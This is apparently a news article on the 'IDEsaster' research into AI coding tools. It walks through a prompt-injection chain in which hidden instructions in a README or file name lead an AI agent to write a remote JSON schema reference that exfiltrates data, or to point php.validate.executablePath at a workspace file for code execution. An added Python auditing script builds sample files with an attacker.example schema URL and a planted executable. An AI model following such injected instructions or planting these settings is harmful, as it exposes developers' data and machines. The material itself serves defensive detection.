A six-month security investigation has uncovered a widespread and critical class of vulnerabilities across the ecosystem of AI-assisted development tools. Dubbed “IDEsaster,” the research details more than thirty security flaws that can be exploited for sensitive data exfiltration and, in the most serious cases, full remote code execution (RCE).
The research paints a bleak picture: 100% of tested AI IDEs and coding assistants were found to be vulnerable. This includes major platforms like Visual Studio Code and JetBrains products, as well as popular assistants such as GitHub Copilot, Cursor, Gemini CLI, and Claude Code. The flaws have already led to the assignment of at least twenty-four CVEs.
The core problem, according to the report, is a fundamental conflict between legacy IDE design and the new autonomous capabilities of AI agents. Traditional IDEs were built on the assumption that only the user would read, edit, and create files; no component acted on its own. Once AI agents gained those abilities, long-standing features that were safe under that assumption became attack surface.
Security researcher Ari Marzouk emphasized that every AI IDE tested “effectively ignore[s] the base software… in their threat model.” They mistakenly treat old features as inherently safe, but the addition of autonomous AI agents weaponizes these features into tools for data exfiltration and RCE.
The attack follows an “IDE-agnostic attack chain” that begins with context hijacking, typically via prompt injection: hidden instructions are planted in seemingly innocuous content such as a README or a file name. Once the AI agent processes this malicious context, it can be directed to perform an action that looks legitimate on its own, such as writing a configuration file, but that triggers unsafe automatic behavior in the underlying IDE software.
One documented exploit has the AI agent write a JSON file containing a reference to a remote schema. The IDE then fetches that schema automatically, and because the URL the agent wrote can carry data it collected earlier in the process, the fetch delivers that data to the attacker-controlled host without any further user action. This behavior was demonstrated across Visual Studio Code, JetBrains IDEs, and Zed.
Another case study showed how an attacker could achieve full remote code execution by manipulating IDE settings: a configuration field such as php.validate.executablePath is pointed at a file inside the workspace, and the IDE then runs that attacker-controlled file the moment a related file type (here, a PHP file) is opened.
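As an added example (not code from the IDEsaster research or from any IDE vendor), the following Python script audits a checked-out workspace for the two IDE-side sinks described above: a JSON file whose top-level "$schema" points at a remote host the IDE would fetch from, and a .vscode/settings.json entry whose key ends in "Path" and resolves to a file inside the workspace. The schema host allowlist, the "*Path" key heuristic, and the sample workspace it builds are all assumptions made for illustration; the allowlist in particular should be tuned to what your IDE is actually configured to fetch.

```python
"""Audit a workspace for IDE-triggered sinks an AI agent may have planted.

Added example, not part of the IDEsaster research. Two checks:
  1. remote_schema: a JSON file's top-level "$schema" points at a host that is
     not allowlisted (the IDE may fetch it automatically, and any data encoded
     in the URL leaves with that request);
  2. workspace_executable: a .vscode/settings.json key ending in "Path" resolves
     to a file inside the workspace, i.e. something the IDE would execute.
"""
import json
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Hosts the IDE legitimately fetches schemas from (assumption; tune per org).
SCHEMA_ALLOWLIST = {"json.schemastore.org", "json-schema.org"}


def _flatten(obj, prefix=""):
    """Yield (dotted_key, value); VS Code accepts nested or dotted setting keys."""
    for key, value in obj.items():
        dotted = f"{prefix}.{key}" if prefix else key
        if isinstance(value, dict):
            yield from _flatten(value, dotted)
        else:
            yield dotted, value


def _load_json(path):
    try:
        return json.loads(path.read_text(encoding="utf-8"))
    except (ValueError, OSError):
        return None  # JSONC (comments) or unreadable: surfaced as a finding


def check_remote_schema(path, data):
    """Flag a top-level $schema the IDE would fetch from a non-allowlisted host."""
    schema = data.get("$schema") if isinstance(data, dict) else None
    if not isinstance(schema, str):
        return None
    url = urlparse(schema)
    if url.scheme not in ("http", "https") or url.hostname in SCHEMA_ALLOWLIST:
        return None
    return {"kind": "remote_schema", "file": str(path), "detail": schema,
            "carries_query": bool(url.query or url.fragment)}


def check_executable_paths(root, path, data):
    """Flag *Path settings whose value resolves to a file inside the workspace."""
    findings = []
    for key, value in _flatten(data):
        if not (key.lower().endswith("path") and isinstance(value, str)):
            continue
        expanded = value.replace("${workspaceFolder}", str(root))
        target = (root / expanded).resolve()  # absolute values stay absolute
        if target.is_relative_to(root) and target.is_file():
            findings.append({"kind": "workspace_executable", "file": str(path),
                             "detail": f"{key} -> {target}"})
    return findings


def audit_workspace(root):
    """Return a list of finding dicts for every JSON file under root."""
    root = Path(root).resolve()
    findings = []
    for path in root.rglob("*.json"):
        data = _load_json(path)
        if data is None:
            findings.append({"kind": "unparsable_json", "file": str(path), "detail": ""})
            continue
        hit = check_remote_schema(path, data)
        if hit:
            findings.append(hit)
        if path.parent.name == ".vscode" and path.name == "settings.json" and isinstance(data, dict):
            findings.extend(check_executable_paths(root, path, data))
    return findings


def build_sample_workspace(root):
    """Constructed sample workspace: one benign and one hostile file of each kind."""
    root = Path(root)
    for sub in ("config", "tools", ".vscode"):
        (root / sub).mkdir(parents=True)
    (root / "package.json").write_text(json.dumps(
        {"$schema": "https://json.schemastore.org/package.json", "name": "demo"}))
    # Agent-written file: the "schema" URL smuggles collected data in its query.
    (root / "config" / "app.json").write_text(json.dumps(
        {"$schema": "https://attacker.example/s.json?d=41414141", "debug": True}))
    (root / "tools" / "php").write_text("#!/bin/sh\necho pwned\n")
    (root / ".vscode" / "settings.json").write_text(json.dumps({
        "php.validate.executablePath": "${workspaceFolder}/tools/php",  # flagged
        "python.defaultInterpreterPath": "/usr/bin/python3",            # outside root
    }))


def demo():
    """Build the sample workspace in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_workspace(tmp)
        return audit_workspace(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f["kind"], f["file"], f["detail"])
```

Run it against a real checkout with audit_workspace(".") before opening the project in an AI-enabled IDE; a hit of either kind in a file you did not write yourself is the point at which to stop and read the agent's transcript.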
The research concludes that there is no quick patch for the underlying problem, because current IDEs were not built on the principle of being “Secure for AI.” Immediate mitigations are available to developers and tool vendors, but the only long-term solution is a fundamental redesign of how IDEs allow AI agents to interact with and act within project files.